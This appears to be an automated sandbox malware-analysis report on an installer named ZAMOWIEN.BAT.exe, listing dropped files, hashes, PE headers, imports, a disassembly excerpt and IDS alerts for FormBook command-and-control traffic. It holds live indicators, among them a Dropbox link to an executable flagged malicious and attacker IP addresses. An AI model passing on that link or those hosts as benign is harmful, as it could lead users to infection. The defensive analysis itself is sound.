                                                                      kJs0JTLO6I.exeGet hashmaliciousMetasploitBrowse
                                                                        https://www.dropbox.com/scl/fi/2u0ns17aqf2nkkout3i4e/Wion-Setup.exe?rlkey=bczprnlv9lpsjsrcm2mwnqhrh&st=tkdq1g8n&dl=1Get hashmaliciousUnknownBrowse
                                                                          Process:C:\Windows\SysWOW64\sdchange.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                          Category:dropped
                                                                          Size (bytes):114688
                                                                          Entropy (8bit):0.9746603542602881
                                                                          Encrypted:false
                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):5632
                                                                          Entropy (8bit):3.81833601044378
                                                                          Encrypted:false
                                                                          SSDEEP:48:S46+/pTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8m/ofjLl:zbuPbO5tCZBVEAWyMEFv2CmCL
                                                                          MD5:50016010FB0D8DB2BC4CD258CEB43BE5
                                                                          SHA1:44BA95EE12E69DA72478CF358C93533A9C7A01DC
                                                                          SHA-256:32230128C18574C1E860DFE4B17FE0334F685740E27BC182E0D525A8948C9C2E
                                                                          SHA-512:ED4CF49F756FBF673449DCA20E63DCE6D3A612B61F294EFC9C3CCEBEFFA6A1372667932468816D3A7AFDB7E5A652760689D8C6D3F331CEDEE7247404C879A233
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: LisectAVT_2403002A_176.exe, Detection: malicious, Browse
                                                                          • Filename: kJs0JTLO6I.exe, Detection: malicious, Browse
                                                                          • Filename: kJs0JTLO6I.exe, Detection: malicious, Browse
                                                                          • Filename: , Detection: malicious, Browse
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L...P.d...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):5.805604762622714
                                                                          Encrypted:false
                                                                          SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                          MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                          SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                          SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                                          SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: , Detection: malicious, Browse
                                                                          • Filename: RFQ_BDS636011.exe, Detection: malicious, Browse
                                                                          • Filename: Quotation.exe, Detection: malicious, Browse
                                                                          • Filename: CERTIFICADO TITULARIDAD.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious, Browse
                                                                          • Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Browse
                                                                          • Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Browse
                                                                          • Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse
                                                                          • Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2023060
                                                                          Entropy (8bit):2.8707432914746587
                                                                          Encrypted:false
                                                                          SSDEEP:12288:XRtsqp2B3QHMw8e84uDE4nGIV2sT31tzU7g7:h7pG3Qsw8hAolVjT3bzU
                                                                          MD5:96DE77AFF89167B8ED632B364AE89C49
                                                                          SHA1:4E4F9C6A2E8A58B4C154558F5F987C8C913AD1F3
                                                                          SHA-256:4F1F1DC637586C1436D3FBE4F68782877C9605CD15F7DEA8E371CC2FB346BBDA
                                                                          SHA-512:3E4AC6B66A3A9475A551C762468F2ED8A96B0EA26D6CE8F6431B233B885FB39C42B9B45129873D3E1A4A57D991BFE7A0FA6D20C6AA416056E2FFE842AF644E08
                                                                          Malicious:false
                                                                          Preview:|>......,........................(......B=.......>..........................................................................................................................................................................................................................................G...V...............j...............................................................................................................................f.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):362934
                                                                          Entropy (8bit):1.2454348476953587
                                                                          Encrypted:false
                                                                          SSDEEP:768:ycdABD0ui2x4w5RSUVuhHBpnARDNxTG5QFcIQSFltdbluQU3xxFrcZ3xgPcWIQXP:rhSpHtlMFAG5jJLxd7N1WB0
                                                                          MD5:DB3628EBC4FD59D2D008E98CA4A9B29F
                                                                          SHA1:51E6D1D34D233BC35E31F5844E892DE321F7A2D4
                                                                          SHA-256:05CFF76B558EF185BE6EB826C28A5883E2D9E0D5FA6512885C7328BDA3E22399
                                                                          SHA-512:E908E28BEDF535231E23F5FD8CE9F108C118C5906AFD5AD41FD58F504F77E2A4446BC977FB5E979258E0C2C5CF40F0E68D8766EF8E6FD75FDD21A8B0623BC2CF
                                                                          Malicious:false
                                                                          Preview:......... ..............i....4.....................................................................9...A....................].................5.........................W......?.............7.'.............................................................................-v.........................3..............................T.ZE..........Z..................................J.....?............................................l...........f..........................................................3.............Q..................,.................................................................................n......................b..m...........X............L........................................................................................................6.........................................,.........p..........>.......................................................................3.....U.............L.................hc.................................................7...;..
                                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):95608
                                                                          Entropy (8bit):2.6652570207119863
                                                                          Encrypted:false
                                                                          SSDEEP:1536:mX5LCdCtvYhSizfSOmbjCjgYwpMjtrTTq5GALzIyBKov6:lYKm42S
                                                                          MD5:404B2620A2BE987A9C6E7E2A018B60A0
                                                                          SHA1:A25302626B3F14A2AE3C5FDCF5CDD1D744A2E923
                                                                          SHA-256:287C24407AD0846E71591F87F56B83C11FF3F929166D520F33F7BCF132928818
                                                                          SHA-512:E7FFF12F2F8E6435026A715E0E88B279D79002929985EF04542DE6E3DCA43430706CB14531124C72E5D00EF0572B57E4AD109FA2A4C3D1E5FBF088EFC9D85BA9
                                                                          Malicious:false
                                                                          Preview:0000000053535353008D8D000A0A000000D4D400DE00590000AEAEAEAEAE0000EB0000000070000010101000000000050500F800000058007171717171717171710000DC0000008E00E8E80018181800002B2B002F0000000000000800CD0000004300FC0000000000000707000000000000000000AF008A8A0000C2C2C2C20000CD006500007A0087007A7A7A7A000000BC0000910000006C000089006F00000000006C000000F100E0000000000000560000C4008100008300000000000056000000D500007900002C2C00B800000000007B7B7B00727200630000000000000000F7F7F7F7F7F70050006500002E0000616100060600B000535353006363636363630050500000050000AFAFAFAFAF0000E600000808007C7C7C00B5B5000000005C008A0019001500007000CD00008400000000BFBFBF00151500A30089005F00E6E600C6000000140000D900560000000000000000000000979700970000006B6B6B00CBCB00008C001C1C00CF0037001C006C00001A1A003200BCBC0033000800BC0000000079790036000000005D5D5D5D0000005151510000006E000000CFCFCF0000999999999999005757001F00000080008200101010000083007500AF004747000000000071710000E100F300540054545400F8F800DCDC008C8C00005B0026000000009E9E00004F4F4F00000089
                                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):345752
                                                                          Entropy (8bit):1.2485863776845234
                                                                          Encrypted:false
                                                                          SSDEEP:1536:vklaVZbQysuTeVS30KMAkX5VaoQc7HtuIX:iYmyqVo0KMrpVaoV7HIIX
                                                                          MD5:4518342768EDDEFC68AA5BB19661821E
                                                                          SHA1:B80B20B6C069D5B8E5CC45CF6232A77CF278CD8F
                                                                          SHA-256:6A358F5EA31BC74F3745B51CA4D326841B7A0918DC7FDEFE908C7FDCD418B6B3
                                                                          SHA-512:28650700CA8D1D5DCCCA1B66C87AF69973B78A6802A83A57CD593896365AAA703CF015C96D954193AEAB84A54E2A2799F5014AE408075FEFAD341C1AD4085E2D
                                                                          Malicious:false
                                                                          Preview:.......B...........Z..e....................!...............t.b...5.......................................................I......................................................................8............................"9........................................................}....(.........................J..........................................................................................$........_................................'.._....................................................................(..........".............................g........N.............E.............................................................................................c................................].........................Q..................................................................................................\...N..............................................................................................4.....N........................q........w............................
                                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):474
                                                                          Entropy (8bit):4.264405979712241
                                                                          Encrypted:false
                                                                          SSDEEP:12:jqkajxrbAdCMARdmqX0wzW9CnofPL5V0FkOArKVXAPlp:RcbAdBAR8Iy1GkOAW9APH
                                                                          MD5:DE9F6CEB400CDE1D8F9FBF08171F9477
                                                                          SHA1:87D7074DC8270C34B2B7EC62C8210930A20BFFE1
                                                                          SHA-256:02168F28D72A2B160700D8EA9A10A84E19AC228F4B585745FD2D04358726E3AD
                                                                          SHA-512:59933F44BBD560010BE827963B005701C15105BF63B7928E4EE988F082AE21CC1C2C02F69FCA9A843639BCAE6292E559D0F7D4A0ACD1144F2E23B904A1A93E1B
                                                                          Malicious:false
                                                                          Preview:nysgerrighed margenindrykning nonenviable,concreate cubation marshlander unfeminized genbrugsbutikker afkogets celloers unreligioned pastaer skalmejes skeletonless reaktionen..halacha soullessly teliostage forldrepars cyrillaceae overstrew synkefrit insolvency aphacic elverpigerne burmaneren benaevnte..speditionsforretninger fauvists jugementets tankeres nervings..hypospadiac jordskorpens knsrolledebats outspy snedkereres cottae,underslagets overnoble preps sengestolpe.
                                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):449911
                                                                          Entropy (8bit):1.2569789859360412
                                                                          Encrypted:false
                                                                          SSDEEP:768:9YfCqMtHliyYFCDMUE9j6yQpYruj+Vpc52c8Jj7E4M4Mify9K7fJVHxQNuVKwCCi:Pt1EWFufP3ei0WjQVzJXK3P
                                                                          MD5:8160C959AE7C3097E787DB269201A40A
                                                                          SHA1:07C8E1065B752B95757B9406656E189A378CEB64
                                                                          SHA-256:DB401C6717EB53E19A51DE00E2AF7AE77FBBD3ACD12E2DA0EBDAA4E0D6FD1880
                                                                          SHA-512:5CE80922FF02A68846A5753C789898DC40924F23A3B5A754EF38230197E2FFDBB5584C6143766F4EB508A7EEFDEE30EEF3A63DDB6FFAE5D6CC3CEC192DFAB679
                                                                          Malicious:false
                                                                          Preview:.._.!..........Z...........Q..................................]......|...........................................................................................x.........................................i..................................................................<........l..................................................................................................................m........................Z.....................................h.......................................x..........h.........................................................."............>............................................4.........................................................9........;..................................%.............^........M................................................O.........g....V........|...............N..{.........................My....................3.....%..*......................V.`.................................................m.........................
                                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):434034
                                                                          Entropy (8bit):1.253922852732317
                                                                          Encrypted:false
                                                                          SSDEEP:1536:CPCW/zuIUVYCi2VH8k9qGNjZ3gs7Ho3pU/4jBhmWGtlXb3N9:NW/yIUZzVHBNjzM5BhelXjN9
                                                                          MD5:85754174D375345F9C389B6657D93CDB
                                                                          SHA1:D944B42D30C74F8BAD33A8A49606E0E3CC924CA4
                                                                          SHA-256:A0290F4B32A4CFF32AC200D055159C55F492CD5D6E290A3438F01EB3F9B12A53
                                                                          SHA-512:3EC9810D47B62FB678DDBC21B697CCDE04912544DD39B02B30B2E56F70D991BEE25404D8EE91949F26A0AAABBC9C9A84EAC18A604DD090BB3550457C0911530F
                                                                          Malicious:false
                                                                          Preview:.........................n.....................................................3.............+...................K.!......................P........%.......3.............A....................................................................................................0..k...........................................................................................v...k................@..........9...............................*......................................s...c..+..2............................................................v..................................M............................................................................................9..~.......1....>..................................................j...........................{.........................................p.t.......................................6..........C.......L.........................d........................n.............m...............................................................K....
                                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):300383
                                                                          Entropy (8bit):7.516444963107852
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Rwp2tO4xrS2QHRr/awvUexDzO4vuTGuEWLJ:Sp2B3QHMw8e84uDE4J
                                                                          MD5:D7455919B2BA8A0709AECC0DD7495F77
                                                                          SHA1:E5B4EBD76BC62A314FD69DFE8872666DFE318211
                                                                          SHA-256:00769FEC391ACFD660C17322C36DE2D8AB852A2CD1B77555FB52EBFFFB3CE731
                                                                          SHA-512:15DC77812A855B07FABC83793AEBC078736862B2D800E07643F4A76720B1F7FE895FFA2F485DFE7FB9330D2F132AC42E4E975D679C50F0F6E13325156D3B05EF
                                                                          Malicious:false
                                                                          Preview:.........))....p..N...................................-...yy...(.................z....................................e..........................j......eeeee................E.........YY............3.................N.....??...................i.......................J......j.........@@@.HH......f..........F..P........+..#...........eeee..........MM..........yyy..........zzzz............................z..ff.....vv...W.,.a...........R.>..............K..............)).............................VV._....qqqq.;;;......7...........X...{...........www.....ttt.|....2.....&&&.KK.s.::::........J.tt....dddd...............ll....................r..h..................................Q....I......zzz........{{..................111.................=..............................m.../........TTT.ZZ.......??.PP...........................77.c.........................y........................I.;...................J..p.................../.........F.......................U...............?...........;.......
                                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):978
                                                                          Entropy (8bit):3.20247177063652
                                                                          Encrypted:false
                                                                          SSDEEP:12:8wl0tsXowAOcQ/tz0/CSLumQX2MJaTRKMJsW+slJaeHgTCNfBT/v4t2YZ/elFlS0:8eLDWLu1Z8ry4HVpdqy
                                                                          MD5:071D8F1B4E7C52E45C37A6C443DACBFE
                                                                          SHA1:6E25C097BD22505CF40FF2DB645D178CDE3557E1
                                                                          SHA-256:33562BCA918D06C4430071866A759E72BDC591A55E83693DCCF4EFA51A3D189F
                                                                          SHA-512:7AC214AC8A037B74B0E5D983BA6C4D91A69CAD75D0739DFC1D3286AF2A2DAE63FE68AECF6998A4E356EB69340BA29A19215800DB1069C1AD0087DC4E6E610E39
                                                                          Malicious:false
                                                                          Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.2...........Power.for.D............................................P.o.w.e.r...f.o.r...........\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.P.o.w.e.r...f.o.r.U.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.T.e.t.r.a.n.y.c.h.u.s.\.t.o.s.s.e.h.o.v.e.d.e.r.n.e.............y.............>.e.L.:..er.=y...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.782868933466172
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:ZAMOWIEN.BAT.exe
                                                                          File size:751'345 bytes
                                                                          MD5:2dbe82e3bc304a5b59b1b7c080464f60
                                                                          SHA1:1db6b6aee8dc85204b14b73a526cddec8a59b700
                                                                          SHA256:11c06f789150adb1484d8f5919399c11be0c4fbc04af20847d4dcb83cb648f02
                                                                          SHA512:ce9001ac8aa9889eca1a4bd4638102f634bd43a80f10d7974d7c95d966d5fb575a55751dedd622b99f8ae62ba3a4c3ef9735ef9029a87b43bf7af5c6689c080c
                                                                          SSDEEP:12288:WIE5EDEgtTeBTgQFZHmsRe3GwGw/HOHnO6LjewtuABBQqGJCUu8M:WIE5Eg6iTgEZZwGwgxjLMkun1M
                                                                          TLSH:92F412033452C5BAED7C8770A82F46A01BA23EAEC5DAC65EE6E03E4D9577350913BF05
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L..._..d.................j....:....
                                                                          Icon Hash:495a1028082232d1
                                                                          Entrypoint:0x40364b
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x64A0DC5F [Sun Jul 2 02:09:35 2023 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                                          Instruction
                                                                          sub esp, 000003F8h
                                                                          push ebp
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          pop edi
                                                                          xor ebp, ebp
                                                                          push 00008001h
                                                                          mov dword ptr [esp+20h], ebp
                                                                          mov dword ptr [esp+18h], 0040A230h
                                                                          mov dword ptr [esp+14h], ebp
                                                                          call dword ptr [004080A0h]
                                                                          mov esi, dword ptr [004080A4h]
                                                                          lea eax, dword ptr [esp+34h]
                                                                          push eax
                                                                          mov dword ptr [esp+4Ch], ebp
                                                                          mov dword ptr [esp+0000014Ch], ebp
                                                                          mov dword ptr [esp+00000150h], ebp
                                                                          mov dword ptr [esp+38h], 0000011Ch
                                                                          call esi
                                                                          test eax, eax
                                                                          jne 00007F7EE8D4B0FAh
                                                                          lea eax, dword ptr [esp+34h]
                                                                          mov dword ptr [esp+34h], 00000114h
                                                                          push eax
                                                                          call esi
                                                                          mov ax, word ptr [esp+48h]
                                                                          mov ecx, dword ptr [esp+62h]
                                                                          sub ax, 00000053h
                                                                          add ecx, FFFFFFD0h
                                                                          neg ax
                                                                          sbb eax, eax
                                                                          mov byte ptr [esp+0000014Eh], 00000004h
                                                                          not eax
                                                                          and eax, ecx
                                                                          mov word ptr [esp+00000148h], ax
                                                                          cmp dword ptr [esp+38h], 0Ah
                                                                          jnc 00007F7EE8D4B0C8h
                                                                          and word ptr [esp+42h], 0000h
                                                                          mov eax, dword ptr [esp+40h]
                                                                          movzx ecx, byte ptr [esp+3Ch]
                                                                          mov dword ptr [007A8358h], eax
                                                                          xor eax, eax
                                                                          mov ah, byte ptr [esp+38h]
                                                                          movzx eax, ax
                                                                          or eax, ecx
                                                                          xor ecx, ecx
                                                                          mov ch, byte ptr [esp+00000148h]
                                                                          movzx ecx, cx
                                                                          shl eax, 10h
                                                                          or eax, ecx
                                                                          movzx ecx, byte ptr [esp+0000004Eh]
                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e00000x20968.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x68050x6a005d82b68a850b7d57aa3f3139bd31d813False0.6663841391509434data6.45459436403362IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xa0000x39e3b80x6007f139da0bd126a9604dd689cc8473cb1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .ndata0x3a90000x370000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x3e00000x209680x20a00191faf30aace30aa98e7371a068a77ebFalse0.5353059147509579data6.032977737676245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x3e03280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.25724594818407664
                                                                          RT_ICON0x3f0b500xb05fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9947509468228832
                                                                          RT_ICON0x3fbbb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3849585062240664
                                                                          RT_ICON0x3fe1580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.42401500938086306
                                                                          RT_ICON0x3ff2000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5061475409836066
                                                                          RT_ICON0x3ffb880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5851063829787234
                                                                          RT_DIALOG0x3ffff00xb8dataEnglishUnited States0.6467391304347826
                                                                          RT_DIALOG0x4000a80x144dataEnglishUnited States0.5216049382716049
                                                                          RT_DIALOG0x4001f00x100dataEnglishUnited States0.5234375
                                                                          RT_DIALOG0x4002f00x11cdataEnglishUnited States0.6056338028169014
                                                                          RT_DIALOG0x4004100x60dataEnglishUnited States0.7291666666666666
                                                                          RT_GROUP_ICON0x4004700x5adataEnglishUnited States0.7888888888888889
                                                                          RT_VERSION0x4004d00x204dataEnglishUnited States0.5406976744186046
                                                                          RT_MANIFEST0x4006d80x290XML 1.0 document, ASCII text, with very long lines (656), with no line terminatorsEnglishUnited States0.5640243902439024
                                                                          DLLImport
                                                                          ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                          SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                          ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                          USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                          GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                          KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-02T07:09:45.075605+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736103.83.194.5080TCP
                                                                          2024-12-02T07:10:28.387140+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449803195.110.124.13380TCP
